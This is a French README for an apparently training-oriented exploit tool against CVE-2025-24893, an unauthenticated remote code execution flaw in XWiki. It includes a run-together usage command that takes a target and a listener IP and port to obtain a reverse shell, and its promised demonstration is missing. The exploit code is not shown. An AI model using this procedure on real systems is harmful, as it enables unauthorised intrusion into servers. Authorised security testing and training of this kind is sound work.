
Exploit de type OSCP pour CVE-2025-24893 sur Linux XWiki
XWiki Platform est une plateforme wiki générique qui fournit des services d'exécution pour les applications construites sur celle-ci. En raison d'une vulnérabilité dans le point de terminaison SolrSearch, un utilisateur non authentifié peut obtenir une exécution de code à distance arbitraire. Cette vulnérabilité affecte la confidentialité, l'intégrité et la disponibilité de l'ensemble de l'installation XWiki.
CVE: CVE-2025-24893
Une démonstration de l'exploit est présentée ci-dessous :

Pour utiliser cet exploit, suivez ces étapes :
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Cet exploit démontre la vulnérabilité d'exécution de code à distance décrite dans CVE-2025-24893 et permet à un utilisateur non authentifié d'obtenir un reverse shell sur les installations XWiki basées sur Linux vulnérables.
J'ai initialement développé cet outil pour une utilisation dans des environnements de formation tels que les laboratoires de préparation OSCP et Hack The Box, où je voulais un moyen simple et fiable de reproduire la vulnérabilité. Comme aucun outil existant ne répondait à mes besoins, j'ai décidé d'en créer un.
Bien que CVE-2025-24893 ait été corrigé depuis longtemps dans les versions prises en charge de XWiki, cet exploit ne doit être utilisé que contre des systèmes que vous possédez ou que vous êtes explicitement autorisé à tester.
L'auteur n'assume aucune responsabilité en cas d'utilisation abusive de ce logiciel ou de tout dommage résultant de son utilisation.
Cet outil est destiné uniquement à des fins éducatives et à des évaluations de sécurité autorisées.
Utilisez-le uniquement contre des systèmes que vous possédez ou que vous êtes explicitement autorisé à tester. L'auteur décline toute responsabilité en cas d'utilisation abusive de ce logiciel ou de tout dommage résultant de son utilisation.
Les contributions sont les bienvenues.
Si vous rencontrez des bugs, avez des suggestions d'amélioration ou souhaitez ajouter la prise en charge de charges utiles, de plateformes ou de fonctionnalités supplémentaires, n'hésitez pas à ouvrir une issue ou à soumettre une pull request.
Les retours constructifs, les rapports de test et les contributions de code sont grandement appréciés.